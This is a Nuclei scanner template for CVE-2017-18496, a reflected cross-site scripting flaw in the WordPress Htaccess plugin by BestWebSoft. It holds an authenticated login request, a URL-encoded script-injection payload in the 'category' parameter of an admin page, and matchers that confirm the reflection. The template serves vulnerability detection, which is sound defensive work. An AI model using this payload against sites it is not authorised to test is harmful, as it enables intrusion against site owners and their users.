nuclei-templates/http/cves/2017/CVE-2017-18496.yaml

54 lines
1.9 KiB
YAML

id: CVE-2017-18496
info:
name: Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting
author: luisfelipe146
severity: medium
description: |
The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues.
reference:
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
- https://nvd.nist.gov/vuln/detail/CVE-2017-18496
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18496
- https://wordpress.org/plugins/htaccess/#developers
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-18496
cwe-id: CWE-79
epss-score: 0.00088
epss-percentile: 0.36836
cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: bestwebsoft
product: htaccess
framework: wordpress
publicwww-query: "/wp-content/plugins/htaccess/"
tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
- 'contains(body_3, "Htaccess by")'
condition: and
# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950